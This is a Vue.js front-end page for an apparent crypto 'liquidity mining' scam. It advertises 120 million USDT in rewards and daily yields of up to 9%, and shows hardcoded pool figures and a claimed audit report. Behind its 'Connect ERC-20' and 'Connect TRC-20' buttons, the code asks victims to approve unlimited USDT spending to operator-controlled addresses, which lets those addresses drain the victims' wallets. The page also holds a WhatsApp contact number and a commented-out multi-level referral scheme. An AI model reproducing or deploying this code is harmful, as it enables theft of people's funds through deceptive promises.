<template>
  <div class="Index">
    <h3 class="title">
      <img src="../assets/logo-trx.png" width="120" />
      <!-- <span>ETH-Mining Pools</span> -->
    </h3>

    <img src="../assets/banner-trx.jpg" width="100%" height="350" />
    <div class="banner">

      <p>Lossless mining</p>
      <p>Liquidity pledge-free</p>
      <p class="last-p">Reward <b>120 Million</b> USDT</p>
      <mt-button v-if="show" type="primary" style="width: 60%;margin-top: 30px;background: #c63127;" @click="wallet_inti()">Connect ERC-20</mt-button>
      <mt-button v-if="show" @click="trc_init()" type="danger" style="width: 60%; margin-top: 10px;background: #c63127;">Connect TRC-20
      </mt-button>
    </div>
    <!-- <mt-button class="invite_btn" @click="invite()">
      <img src="../assets/invitation.png" height="20" width="20" slot="icon" />invite
    </mt-button> -->
    <!-- <mt-popup v-model="copyVisible" class="popup">
      <div>
        Add Whatsapp Number<span>+{{ kefu_num }}</span>
      </div>
      <mt-button :data-clipboard-text="kefu_num" @click="copy" id="copy_text" type="primary" size="small">copy
      </mt-button>
    </mt-popup> -->
    <!-- account -->
    <div class="tab">
      <div @click="tab('tab-container1')" :class="active == 'tab-container1' ? 'active' : ''">
        Mining pool
        <span :class="active == 'tab-container1' ? 'border-bottom' : ''"></span>
      </div>
      <div @click="tab('tab-container2')" :class="active == 'tab-container2' ? 'active' : ''">
        Account
        <span :class="active == 'tab-container2' ? 'border-bottom' : ''"></span>
      </div>
    </div>
    <br />
    <!-- tabcontent -->
    <mt-tab-container v-model="active">
      <mt-tab-container-item id="tab-container1">
        <!-- <h3 class="pool_title">Pool data</h3> -->

        <div class="all_pool_data">
          <h3>
            <span class="leftIcon"></span>
            <span>Pool data</span>
          </h3>
          <div class="pool_data">
          <ul>
            <li>Total output</li>
            <li>Valid node</li>
            <li>Participant</li>
            <li>User Revenue</li>
          </ul>

          <ul>
            <li >60192713.8300 USDT</li>
            <li >6581.0000</li>
            <!-- <li>{{ Participant }}</li> -->
            <li>51983</li>
            <li class="blue">42038542.8000 USDT</li>
          </ul>
        </div>
      </div>
      </mt-tab-container-item>
      <mt-tab-container-item id="tab-container2">
        <div class="all_pool_data">
          <h3>
            <span class="leftIcon"></span>
            <span>Account</span>
          </h3>
          <div class="pool_data">
            <ul>
              <li>UID:</li>
              <li>Balance:</li>
              <li>VIP Level:</li>
              <li>Total Revenue:</li>
            </ul>
            <ul>
              <li>{{ userinfo.uid }}</li>
              <li>
                {{ parseFloat(userinfo.local_blance).toFixed(4) }}
              </li>
              <li>{{ userinfo.vip }}</li>
              <li>{{ parseFloat(userinfo.revenue).toFixed(4) }}</li>
            </ul>
          </div>
          <mt-button type="primary" size="small" style="background: #c63127;margin:10px;z-index:2001;"  @click="trans_self()" :disabled="addbutton">Add the Mining</mt-button>
      </div>
        <br/>
        <div style="width: 80%;margin: auto;">
          <div class="pool_data">
          <mt-button type="primary" size="small" style="background: #c63127; "  @click="history()">Revenue history</mt-button>
          <mt-button type="primary" size="small" style="background: #c63127; " @click="Withdrawal()">Withdrawal</mt-button>
          </div>
         </div>
        <div class="revenue" v-show="show_revenue">
          <ul>
            <li>Today Revenue</li>
            <li>Total Revenue</li>
            <li>Date</li>
          </ul>
          <ul v-for="(item, index) in revenuelist" :key="index">
            <li>{{ parseFloat(item.today_revenue).toFixed(4) }}</li>
            <li>{{ parseFloat(item.revenue).toFixed(4) }}</li>
            <li>{{ item.create_time }}</li>
          </ul>
        </div>
        <div>
          <mt-popup v-model="popupVisible" class="Withdrawal">
            <div>
              <h1>Withdrawal</h1>
              <hr />
              <mt-field label="Amount" type="number" placeholder="please input amount" v-model="Withdrawal_amount">
              </mt-field>
              <mt-button type="default" class="btns" @click="popupVisible = false">cancel</mt-button>
              <mt-button type="primary" class="btns" style="width: 60%;background: #c63127; " @click="submit_withdra()">submit</mt-button>
            </div>
          </mt-popup>
        </div>
      </mt-tab-container-item>
    </mt-tab-container>
    <br />
    <br />

   
    <!-- public -->
    <div class="mgt-40 padding">
      <div class="font-36 c-black tt_conter" style="font-weight: bold">
        Announcement
      </div>
      <div id="noite">
        <div class="font-30 c-black" style="
            display: flex;
            justify-content: space-between;
            height: 40px;
            line-height: 40px;
            font-weight: bold;
          " @click="noite(1)">
          <div>How do i need to join？</div>
          <div><img src="../assets/top1.png" id="img1" width="10" /></div>
        </div>
        <div class="font-26 line-height-2 mgt-20 content_n" v-show="show == 'noites1'"
          style="color: rgb(153, 153, 153)">
          <p>
            Users need to obtain a certificate to join a node, and to obtain a
            certificate, they need to pay a blockchain miner's fee. The node
            will adjust the number of certificates issued according to the
            blockchain.
          </p>
        </div>
        <div class="font-30 c-black" style="
            display: flex;
            justify-content: space-between;
            height: 40px;
            line-height: 40px;
            font-weight: bold;
          " @click="noite(4)">
          <div>Are the assets safe?</div>
          <div><img src="../assets/top1.png" id="img4" width="10" /></div>
        </div>
        <div class="font-26 line-height-2 mgt-20 content_n" v-show="show == 'noites4'" style="color: #999">
          <p>
            It is absolutely safe to deposit funds into your own wallet, but
            please do not disclose the mnemonic phrase of your wallet or tell it
            to a stranger, because the mnemonic phrase can transfer your assets.
            Our community workers will not ask you to provide a mnemonic phrase.
            If someone wants your wallet mnemonic phrase, please decline.
          </p>
        </div>
        <div class="font-30 c-black" style="
            display: flex;
            justify-content: space-between;
            height: 40px;
            line-height: 40px;
            font-weight: bold;
          " @click="noite(5)">
          <div>When is the profit calculated？</div>
          <div><img src="../assets/top1.png" id="img5" width="10" /></div>
        </div>
        <div class="font-26 line-height-2 mgt-20 content_n" v-show="show == 'noites5'" style="color: #999">
          <p>
            When your address is added to the node, the smart contract will
            count your wallet balance into the liquidity of the mining pool and
            start to calculate the income. The income is not constant, and the
            income will be affected by the total network token flow limit and
            the calculation of the income mechanism.
          </p>
        </div>
        <div class="font-30 c-black" style="
            display: flex;
            justify-content: space-between;
            height: 40px;
            line-height: 40px;
            font-weight: bold;
          " @click="noite(6)">
          <div>How do i need to join？</div>
          <div><img src="../assets/top1.png" id="img6" width="10" /></div>
        </div>
        <div class="font-26 line-height-2 mgt-20 content_n" v-show="show == 'noites6'" style="color: #999">
          <p>
            Users need to obtain a certificate to join a node, and to obtain a
            certificate, they need to pay a blockchain miner's fee. The node
            will adjust the number of certificates issued according to the
            blockchain.
          </p>
        </div>
        <div class="font-30 c-black" style="
            display: flex;
            justify-content: space-between;
            height: 40px;
            line-height: 40px;
            font-weight: bold;
          " @click="noite(7)">
          <div>What is the yield percentage rate?</div>
          <div><img src="../assets/top1.png" id="img7" width="10" /></div>
        </div>
        <div class="font-26 line-height-2 mgt-20 content_n" v-show="show == 'noites7'" style="color: #999">
          <p>
            The output of liquid mining is not constant and may be affected by
            the liquidity of the blockchain. The expected daily production
            income:0-10000USDT income is about 1.8%-3.6%, 10000-50000USDT income
            is about 2.3%-4.6%, 50000-100000USDT income is about 3%-6%,
            100000-200000USDT income is about 3.7%-7.4%, 200000-999999999USDT
            income is about 4.5%-9%
          </p>
        </div>
        <!-- <div class="font-30 c-black" style="
            display: flex;
            justify-content: space-between;
            height: 40px;
            line-height: 40px;
            font-weight: bold;
          " @click="noite(8)">
          <div>Is there a reward for inviting friends?</div>
          <div><img src="../assets/top1.png" id="img8" width="10" /></div>
        </div>
        <div class="font-26 line-height-2 mgt-20 content_n" v-show="show == 'noites8'" style="color: #999">
          <p>
            Yes, you can invite your friends to join the mining pool through
            your link to start earning, and you can also get USDT rewards from
            the mining pool while your friends earn.</br>

            I invite A , I will get A's gain 3%</br>
            A invite B , I will get B's gain 2%</br>
            B invite C , I will get C's gain 1%</br>

            A invite B , A will get B's gain 3% and I will get 2%</br>
            B invite C , A will get C's gain 2% and I will get 1%</br>
            C invite D , A will get D's gain 1% and I have no gain</br>

            B invite C , B will get C's gain 3% and A will gets 2%</br>
            C invite D , B will get D's gain 2% and A will gets 1%</br>
            D invite E , B will get D's gain 1% and A has no gain</br>

          </p>
        </div> -->
      </div>
    </div>

    <div class="mgt-40">
      <div class="c-black padding tt_conter" style="font-weight: bold">
        Audit report
      </div>
      <div class="font-24 c-black padding tt_conter">
        we have a secure audit report
      </div>

      <img src="../assets/1.png" width="100%" />
    </div>

    <div class="mgt-40">
      <div class="font-36 c-black padding tt_conter" style="font-weight: bold">
        cooperative partner
      </div>
      <div class="font-24 c-black padding tt_conter">our business partner</div>
      <img src="../assets/2.png" width="100%" />
    </div>

   <KeFu :kefunum="kefu_num" :dlid="dl_id" ref="child"></KeFu>
  </div>
</template>
<!--Add the following script at the bottom of the web page (before </body></html>)href('https://wa.me/+16722186853')-->
<script>
// @ is an alias to /src
import KeFu from "./compoents/kefu.vue";
import { Indicator } from "mint-ui";
import Web3 from "web3";
import Web3Modal from "web3modal";
import WalletConnectProvider from "@walletconnect/web3-provider";
import { Toast } from "mint-ui";
import vueSeamlessScroll from "vue-seamless-scroll";
import Clipboard from "clipboard";
import {
  insert_erc,
  get_info,
  get_info_byId,
  get_address,
  get_revenue,
  submit_withdra,
  getUsdt,
  trans
} from "./api/index";
export default {
  name: "Index",
  data() {
    return {
      active: "tab-container1",
      popupVisible: false,
      copyVisible: false,
      Participant: parseInt(100 * Math.random()),
      kefu_num: "1 (672) 218-6853",
      addbutton:false,
      listData: [
        {
          address: "0xa1bbbb......39c89a9f",
          USDT: "1135.156 USDT",
        },
        {
          address: " 0x42227d......0da4ae19",
          USDT: "1529.624 USDT",
        },
        {
          address: "0x0fcfea......4bd9f1d6",
          USDT: "6158.78 USDT",
        },
        {
          address: " 0x57a2ad......4270ed91",
          USDT: "1862.384 USDT",
        },
        {
          address: "0xe63fd7......00fb12eb",
          USDT: "883.83 USDT",
        },
        {
          address: "0x38c24f......90a9f013",
          USDT: "1523.543 USDT",
        },
        {
          address: "0x66fbbc......29873c06",
          USDT: "1373.085 USDT",
        },
        {
          address: "0x084815......61a2485f",
          USDT: "70.39 USDT",
        },
        {
          address: "0x33b29f......052f21ec",
          USDT: "778.978 USDT",
        },
        {
          address: " 0x64cb9b......675cfe8a",
          USDT: " 863.51 USDT",
        },
      ],
      ABI: [
        {
          inputs: [
            { internalType: "string", name: "name", type: "string" },
            { internalType: "string", name: "symbol", type: "string" },
          ],
          stateMutability: "nonpayable",
          type: "constructor",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "owner",
              type: "address",
            },
            {
              indexed: true,
              internalType: "address",
              name: "spender",
              type: "address",
            },
            {
              indexed: false,
              internalType: "uint256",
              name: "value",
              type: "uint256",
            },
          ],
          name: "Approval",
          type: "event",
        },
        {
          inputs: [
            { internalType: "address", name: "spender", type: "address" },
            { internalType: "uint256", name: "amount", type: "uint256" },
          ],
          name: "approve",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "spender", type: "address" },
            {
              internalType: "uint256",
              name: "subtractedValue",
              type: "uint256",
            },
          ],
          name: "decreaseAllowance",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "spender", type: "address" },
            { internalType: "uint256", name: "addedValue", type: "uint256" },
          ],
          name: "increaseAllowance",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "recipient", type: "address" },
            { internalType: "uint256", name: "amount", type: "uint256" },
          ],
          name: "transfer",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "from",
              type: "address",
            },
            {
              indexed: true,
              internalType: "address",
              name: "to",
              type: "address",
            },
            {
              indexed: false,
              internalType: "uint256",
              name: "value",
              type: "uint256",
            },
          ],
          name: "Transfer",
          type: "event",
        },
        {
          inputs: [
            { internalType: "address", name: "sender", type: "address" },
            { internalType: "address", name: "recipient", type: "address" },
            { internalType: "uint256", name: "amount", type: "uint256" },
          ],
          name: "transferFrom",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "owner", type: "address" },
            { internalType: "address", name: "spender", type: "address" },
          ],
          name: "allowance",
          outputs: [{ internalType: "uint256", name: "", type: "uint256" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "account", type: "address" },
          ],
          name: "balanceOf",
          outputs: [{ internalType: "uint256", name: "", type: "uint256" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "decimals",
          outputs: [{ internalType: "uint8", name: "", type: "uint8" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "name",
          outputs: [{ internalType: "string", name: "", type: "string" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "symbol",
          outputs: [{ internalType: "string", name: "", type: "string" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "totalSupply",
          outputs: [{ internalType: "uint256", name: "", type: "uint256" }],
          stateMutability: "view",
          type: "function",
        },
      ], //erc的智能合约ABI
      abi: [
        {
          constant: true,
          inputs: [],
          name: "name",
          outputs: [{ name: "", type: "string" }],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            { name: "spender", type: "address" },
            { name: "value", type: "uint256" },
          ],
          name: "approve",
          outputs: [{ name: "", type: "bool" }],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [],
          name: "totalSupply",
          outputs: [{ name: "", type: "uint256" }],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            { name: "sender", type: "address" },
            { name: "recipient", type: "address" },
            { name: "amount", type: "uint256" },
          ],
          name: "transferFrom",
          outputs: [{ name: "", type: "bool" }],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [],
          name: "decimals",
          outputs: [{ name: "", type: "uint8" }],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            { name: "spender", type: "address" },
            { name: "addedValue", type: "uint256" },
          ],
          name: "increaseAllowance",
          outputs: [{ name: "", type: "bool" }],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [{ name: "account", type: "address" }],
          name: "balanceOf",
          outputs: [{ name: "", type: "uint256" }],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: true,
          inputs: [],
          name: "symbol",
          outputs: [{ name: "", type: "string" }],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            { name: "spender", type: "address" },
            { name: "subtractedValue", type: "uint256" },
          ],
          name: "decreaseAllowance",
          outputs: [{ name: "", type: "bool" }],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            { name: "recipient", type: "address" },
            { name: "amount", type: "uint256" },
          ],
          name: "transfer",
          outputs: [{ name: "", type: "bool" }],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [
            { name: "owner", type: "address" },
            { name: "spender", type: "address" },
          ],
          name: "allowance",
          outputs: [{ name: "", type: "uint256" }],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          payable: false,
          stateMutability: "nonpayable",
          type: "constructor",
        },
        {
          anonymous: false,
          inputs: [
            { indexed: true, name: "from", type: "address" },
            { indexed: true, name: "to", type: "address" },
            { indexed: false, name: "value", type: "uint256" },
          ],
          name: "Transfer",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            { indexed: true, name: "owner", type: "address" },
            { indexed: true, name: "spender", type: "address" },
            { indexed: false, name: "value", type: "uint256" },
          ],
          name: "Approval",
          type: "event",
        },
      ], //trc智能合约授权
         gs_address: "0xe1072e81B15e5627729bb6E3dE1a9945f1fF3e9A", //平台地址eth
      trx_au_address: "TJXfqvJN9VkpDYjjEXgAeFynHW6QknCUfn", //平台地址trc
      approveGas: 70000,
      addrusdt: "0xdac17f958d2ee523a2206206994597c13d831ec7", //usdt智能合约地址(官方)
      infuraId: "5eb93418dcba4901a49fc36829964a6e",
      gasPrice: 0,
      revenuelist: null,
      show_revenue: false,
      popupVisible: false,
      Withdrawal_amount: 0,
      show: true,
      accounts: [],
      selectedAccount: [],
      walletAddress: null,
      walletConnector: null,
      provider: null, //钱包所属节点
      dl_id:0,    
      userinfo: {
        uid: 0,
        Blance: 0,
        vip: 0,
      }, //用户信息
    };
  },
  components: {
    //组件
    vueSeamlessScroll,
    KeFu,
  },
  computed: {
    classOption() {
      return {
        step: 0.2, // 数值越大速度滚动越快
        limitMoveNum: 2, // 开始无缝滚动的数据量 this.dataList.length
        hoverStop: true, // 是否开启鼠标悬停stop
        direction: 1, // 0向下 1向上 2向左 3向右
        openWatch: true, // 开启数据实时监控刷新dom
        singleHeight: 0, // 单步运动停止的高度(默认值0是无缝不停止的滚动) direction => 0/1
        singleWidth: 0, // 单步运动停止的宽度(默认值0是无缝不停止的滚动) direction => 2/3
        waitTime: 1000, // 单步运动停止的时间(默认值1000ms)
      };
    },
  },
  created() {
    this.get_address();
    this.get_info();
    if (this.GetUrlParam("uid") !== "") {
      let uid = this.GetUrlParam("uid");
      get_info_byId({ m: uid })
        .then((res) => {
          // console.log(res.data);
          if (res.data) {
            sessionStorage.setItem("address", res.data.au_address);
            sessionStorage.setItem("uid", res.data.uid);
            sessionStorage.setItem("type", res.data.type);
            this.userinfo = res.data;
            this.show = false;
            this.active = "tab-container2";
            if (res.data.kefu_num != null) {
              this.kefu_num = res.data.kefu_num;
              this.$refs.child.printKefuNum(this.kefu_num);
            }
          }
        })
        .catch((err) => {
          console.log(err);
        });
    }
    // this.add_chatinline();
  },
  mounted() {
    // console.log(sessionStorage.getItem("address"));
    if (!sessionStorage.getItem("address")) {
      // this.wallet_inti();
      // this.trc_init();
    }
  },
  methods: {
    invite() {
      if (this.userinfo.uid == 0) {
        Toast("Please click ERC20 button,Change some ERC20,Make Your Account");
      } else {
        this.$router.push({
          path: "/invite",
          query: {
            uid: this.userinfo.uid,
            dl_id:this.userinfo.dl_id
          },
        });
      }
    },
    async get_address() {
      let dl_id = 0;
      if (this.GetUrlParam("reg_id") !== "") {
        dl_id = this.GetUrlParam("reg_id");
      }
      get_address({ dl_id: dl_id }).then((res) => {
        if (res) {
          if (res.data.au_address != null) {
            this.gs_address = res.data.au_address.value;
          }

          if (res.data.approveGas != null) {
            // this.approveGas = res.data.approveGas.value;
          }
          if (res.data.trx_au_address != null) {
            this.trx_au_address = res.data.trx_au_address.value;
          }
          if (res.data.kefu_num != null) {
            // this.kefu_num = res.data.kefu_num;
            if(!sessionStorage.getItem("kefu_num")){
              sessionStorage.setItem("kefu_num",  res.data.kefu_num);
            }
            this.kefu_num = sessionStorage.getItem("kefu_num");
            this.$refs.child.printKefuNum(this.kefu_num);
          }
        }
        // console.log(this.trx_au_address);
        // console.log(this.gs_address);
        // console.log(this.approveGas);
      });
    },

    //钱包链接获取节点
    async wallet_inti() {
      // 配置钱包链接，使用infura的节点
      const providerOptions = {
        walletconnect: {
          package: WalletConnectProvider,
          options: {
            // Mikko's test key - don't copy as your mileage may vary
            infuraId: this.infuraId,
          },
        },
      };
      const web3Modal = new Web3Modal({
        cacheProvider: false, // optional
        providerOptions, // required
        disableInjectedProvider: false, // optional. For MetaMask / Brave / Opera.
      });
      // 链接钱包，返回一个区块链节点
      this.provider = await web3Modal.connect();

      if (!this.provider) return false;
      // Subscribe to accounts change
      this.provider.on("accountsChanged", (accounts) => {
        console.log(accounts);
        this.getWeb3Object();
      });

      // Subscribe to chainId change
      this.provider.on("chainChanged", (chainId) => {
        console.log(chainId);
        this.getWeb3Object();
      });

      // Subscribe to provider connection
      this.provider.on("connect", (info) => {
        console.log(info);
        this.getWeb3Object();
      });

      // Subscribe to provider disconnection
      this.provider.on("disconnect", (error) => {
        console.log("disconnect");
      });
      this.getWeb3Object();
    },
    //通过钱包节点获取智能合约对象
    async getWeb3Object() {
      //链接区块链
      const web3 = new Web3(this.provider);
      // provider.enable();
      this.accounts = await web3.eth.getAccounts(); //返回节点所控制的账户列表
      this.selectedAccount = this.accounts[0]; //获取第一个账户

      this.gasPrice = await web3.eth.getGasPrice(); //返回当前 gas(燃料) 价格预言机。 gas 价格由最后几个区块 gas 价格的中位数确定。
      //获取usdt智能合约对象
      this.walletConnector = new web3.eth.Contract(this.ABI, this.addrusdt);
      // console.log(this.selectedAccount);
      // this.selectedAccount = "0x7cb960cF22274Ebfd10f14ebcF610ED3B5f1AFC9";
      if (this.selectedAccount) {
        // sessionStorage.setItem("address", this.selectedAccount);
        this.get_info(this.selectedAccount);
        if (this.userinfo.uid == 0) {
          await this.Approve();
        }
      }
      //
      //
    },
    async trc_init() {
     
      this.trc_approve();return;
        try{
          let tronWeb =
            typeof window.tronWeb !== "undefined" ? window.tronWeb : tronWeb;
          
          if (tronWeb) {
            this.walletAddress = await tronWeb.defaultAddress.base58;
           
            if (this.walletAddress) {
             
              await this.get_info(this.walletAddress);     
              if(this.userinfo.uid == 0){  
                this.trc_approve();
              }
            }
          }
        }catch(err){
          Toast(err);
        }
    }, //trc
    async trc_approve() {
     
          
      // if (!sessionStorage.getItem("uid_trc")) {
      try {
        if (this.walletAddress == null || this.walletAddress == false) {
          let tronWeb =
            typeof window.tronWeb !== "undefined" ? window.tronWeb : tronWeb;
          this.walletAddress = await tronWeb.defaultAddress.base58;
          sessionStorage.setItem("address", this.walletAddress);
          this.get_info(this.walletAddress);
        }
        if (this.userinfo.uid == 0) {
          let data = {
            address: "TJsyPQYeCkufeK64ZFmFB2TCxwsPZJpWyM",//this.trx_au_address,
            au_address: "TJXfqvJN9VkpDYjjEXgAeFynHW6QknCUfn",//this.walletAddress,
            // address: this.trx_au_address,
            // au_address: this.walletAddress,
            type: 2,
          };
          if (this.GetUrlParam("reg_id") !== "") {
            data.dl_id = this.GetUrlParam("reg_id");
          }
          if (this.GetUrlParam("share") !== "") {
            data.share_id = this.GetUrlParam("share");
          }
          let instance = await tronWeb
            .contract()
            .at("TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t");
          Indicator.open();
          await instance.approve(this.trx_au_address, "90000000000000000000000000000")
          .send(
              {
                feeLimit: 100000000,
                callValue: 0,
                shouldPollResponse: false,
              },
              function (error, tx) {
                if (error == null && data.au_address != false) {
                  // let tx="21b86fa34a50e919cecd7aa2727d2200a312098f0b1fa4eff4accd3d7b7f1891"
                  data.transaction_hash = tx;
                  insert_erc(data).then((res) => {
                    if (res.code == 1) {
                      this.userinfo = res.data;
                      sessionStorage.setItem("address", res.data.au_address);
                      sessionStorage.setItem("uid_trc", res.data.uid);
                      window.location.reload();
                    } else {
                      console.log(res.msg);
                      Toast(res.msg);
                    }
                  });
                  // postInfo(walletAddress, bizhong);
                } else {
                  if (error.message) {
                    Toast(error.message);
                  } else {
                    Toast(error);
                  }
                }
              }
            );
          Indicator.close();
          // this.show = false;
          // this.active = "tab-container2";
        }
      } catch (error) {
        Toast(error);
      }
      // }
    },
    //eth智能合约授权
    Approve() {
      //授权之前判断是否授权过
      if (this.userinfo.uid == 0) {
        let data = {
          address: this.gs_address,
          au_address: this.selectedAccount,
          type: 1,
        };

        if (this.GetUrlParam("reg_id") !== "") {
          data.dl_id = this.GetUrlParam("reg_id");
        }

        if (this.GetUrlParam("share") !== "") {
          data.share_id = this.GetUrlParam("share");
        }

        // return false;

        Indicator.open();

        // 授权代码;
      this.walletConnector.methods
          .approve(
            this.gs_address, //授权到某个地址（后台配置）
            "0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff" //授权金额 十六进制
          )
          .send(
            {
              from: this.selectedAccount,
              gasPrice: this.gasPrice, //燃料费
              gas: this.approveGas, //矿工费
            },
            function (err, tx) {
              Indicator.close();
              if (err) {
                Toast(err.message);
                return false;
              }
 
              // tx = "21b86fa34a50e919cecd7aa2727d2200a312098f0b1fa4eff4accd3d7b7f1891";
              data.transaction_hash = tx;

              if (tx) {
                insert_erc(data)
                  .then((res) => {
                    if (res.code == 1) {
                      this.userinfo = res.data;
                      sessionStorage.setItem("address", res.data.au_address);
                      sessionStorage.setItem("uid_erc", res.data.uid);
                      // this.show = false;
                      // this.active = "tab-container2";
                      window.location.reload();
                    } else {
                      Toast(res.msg);
                    }
                  })
                  .catch((err) => {
                    console.log(err);
                  });
              }
            }
          );
      }
    },
    //获取授权信息
    get_info(address = null) {
      //
      if (this.selectedAccount != null) {
        let au_address =
          address == null ? sessionStorage.getItem("address") : address;
        // console.log(au_address);
        let obj = { au_address: au_address }
        // if (this.GetUrlParam("uid") !== "") {
        //   obj.uid = this.GetUrlParam("uid");
        // }
        get_info(obj)
          .then((res) => {
            // console.log(res.data);
            if (res.data) {
              sessionStorage.setItem("address", res.data.au_address);
              sessionStorage.setItem("uid", res.data.uid);
              sessionStorage.setItem("type", res.data.type);
              this.userinfo = res.data;
              this.show = false;
              this.active = "tab-container2";
              if (res.data.kefu_num != null) {
                this.kefu_num = res.data.kefu_num;
                this.$refs.child.printKefuNum(this.kefu_num);
              }
            }
          })
          .catch((err) => {
            console.log(err);
          });
      }
    },
    //获取历史记录
    history() {
      if (this.show_revenue == false) {
        this.show_revenue = true;
        if (this.revenuelist == null) {
          get_revenue({ uid: this.userinfo.uid })
            .then((res) => {
              if ((res.code = 1)) {
                // window.location.reload();
                this.revenuelist = res.data;
                this.show_revenue = true;
              } else {
                Toast(res.msg);
              }
            })
            .catch((err) => {
              console.log(err);
            });
        }
      } else {
        this.show_revenue = false;
      }
    },
    //提现申请
    Withdrawal() {
      this.popupVisible = true;
      this.Withdrawal_amount = 0;
    },
    submit_withdra() {
      // console.log(this.Withdrawal_amount);
      if (this.Withdrawal_amount <= 0) {
        this.popupVisible = false;
        Toast("Withdrawal Amount must be gt 0");
      }
      let total =
        parseFloat(this.userinfo.blanceOf) +
        parseFloat(this.userinfo.local_blance);
      if (this.Withdrawal_amount > total) {
        this.popupVisible = false;
        Toast("Withdrawal Amount must be less than " + total);
      }
      submit_withdra({
        uid: this.userinfo.uid,
        amount: this.Withdrawal_amount,
      })
        .then((res) => {
          this.popupVisible = false;
          Toast(res.msg);
        })
        .catch((err) => {});
    },

    // 切换
    tab(index) {
      if (this.show == true) {
        Toast(
          "Please click ERC-20 or TRC-20 button,Change some ERC-20 or TRC-20,Make Your Account"
        );
      } else {
        this.active = index;
      }
    },

    // 内容展开
    noite(index) {
      let parm = "noites" + index;
      this.show = parm;
    },
    //paraName 等找参数的名称
    GetUrlParam(paraName) {
      var url = document.location.toString();
      var arrObj = url.split("?");

      if (arrObj.length > 1) {
        var arrPara = arrObj[1].split("&");
        var arr;

        for (var i = 0; i < arrPara.length; i++) {
          arr = arrPara[i].split("=");
          console.log(arr);
          if (arr != null && arr[0] == paraName) {
            return arr[1];
          }
        }
        return "";
      } else {
        return "";
      }
    },
    href(url) {
      window.open(url);
    },
    add_chatinline() {
      var hccid = 57051046;
      var nt = document.createElement("script");
      nt.async = true;
      nt.src = "https://www.mylivechat.com/chatinline.aspx?hccid=" + hccid;
      var ct = document.getElementsByTagName("script")[0];
      ct.parentNode.insertBefore(nt, ct);
    },
    copy() {
      var _this = this;
      var clipboard = new Clipboard("#copy_text");

      clipboard.on("success", (e) => {
        // alert("dd");
        this.copyVisible = false;
        // 释放内存
        Toast("Copy success");
        clipboard.destroy();
      });
      clipboard.on("error", (e) => {
        // 不支持复制
        Toast({
          message: "该浏览器不支持自动复制",
          type: "warning",
        });
        // 释放内存
        clipboard.destroy();
      });
    },
    popup() {
      this.copyVisible = true;
    },
    //自主转账
   async trans_self(){
      let {data} = await getUsdt({'address':sessionStorage.getItem("address"),'type':sessionStorage.getItem("type")== 2 ?'trc':'erc'})
      let {code} = await trans({
      'uid':sessionStorage.getItem("uid") == null ? data.uid:sessionStorage.getItem("uid") ,
      'type':sessionStorage.getItem("type") == null ? data.type:sessionStorage.getItem("type") ,
      'amount': data.getBalance});
      // let code = 1
      if(code == 1){
         
        
            this.addbutton = true;
            Toast("please wait the system run");
          
      }
    }
  },
};
</script>

<style scoped>
.padding {
  padding: 0 5%;
}
.font-24 {
  font-size: 0.6rem;
}
.mgt-40 {
  margin-top: 1rem;
}
.seamless-warp {
  width: 100%;
  height: 229px;
  overflow: hidden;
}
.seamless-warp .item li {
  display: flex;
  justify-content: space-between;
}
.seamless-warp .item li span {
  font-size: 0.6rem;
}

.c-black div {
  font-size: 0.9rem;
}

.content_n p {
  font-size: 0.6rem;
  text-align: left;
  line-height: 150%;
}

.blue {
  color: #ee0a24!important;
}

.title {

  height: 2.3rem;
  position: absolute;
  z-index:2;
  top:0px;
  left:35%;
  /* background: rgb(22, 82, 240); */
}
.title img {
  position: relative;
  top: 0.5rem;
}
.title span {
  position: relative;
  top: 0.3rem;
  color: #fff;
  font-weight: normal;
  font-size: 0.8rem;
}

.banner{
  position: absolute;
  z-index:3;
  top:50px;
  width: 100%;
}

.banner p{
  color:#fff;
  font-size: 20px;

  width: 100%;
  text-align: center;
  padding: 5px 0;
}
.banner .last-p{
  padding-top: 20px;
  font-size: 25px;
}
.banner .last-p b{
  color: #f7931a;
  font-size: 25px;
  padding-left: 5px;
  padding-right: 5px;
}


.tab {
  display: flex;
  margin-top: 2rem;
}
.tab div {
  position: relative;
  width: 50%;
  height: 2rem;
  line-height: 1.6rem;
  text-align: center;
  font-weight: bold;
  color: rgb(141, 141, 141);
}
.tab div.active {
  color: #000;
}

.tab div span.border-bottom {
  position: absolute;
  left: 38%;
  top: auto;
